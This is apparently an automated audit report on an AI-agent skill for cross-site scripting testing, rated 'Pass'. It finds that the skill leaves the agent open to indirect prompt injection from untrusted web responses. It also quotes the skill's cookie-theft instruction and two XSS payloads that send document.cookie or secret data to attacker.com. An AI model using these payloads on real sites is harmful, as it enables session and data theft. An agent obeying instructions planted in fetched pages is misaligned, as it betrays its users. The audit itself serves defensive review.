xss-methodology
Pass
Audited by Gen Agent Trust Hub on May 15, 2026
Risk Level: SAFEPROMPT_INJECTIONDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection as it instructs the agent to ingest and analyze untrusted data from web responses.
- Ingestion points: Target website responses (HTML body, headers) retrieved via the
http_requesttool as described inSKILL.md(Phase 0). - Boundary markers: Absent. The instructions do not specify delimiters or warnings to ignore embedded instructions in the processed data.
- Capability inventory: The agent has access to
http_requestfor network operations andpython3for script execution. - Sanitization: Absent. No validation or escaping of external content is mandated before the agent processes the data.
- [DATA_EXFILTRATION]: The skill provides methodology and specific payloads for exfiltrating sensitive data, which is consistent with its role as a security testing tool.
- Evidence:
AGENT.mdinstructs the agent to "窃取 cookie 或读取页面内容" (steal cookies or read page content).references/xss-bypass-and-types.mdcontains payloads such aslocation='https://attacker.com/?c='+document.cookieand<link rel=prefetch href="http://attacker.com/?c=SECRET_DATA">. - [COMMAND_EXECUTION]: The skill facilitates the execution of local scripts and the hosting of servers to support testing operations.
- Evidence:
AGENT.mdexplicitly listspython3as a preferred tool for encoding payloads and starting receiving servers.
Audit Metadata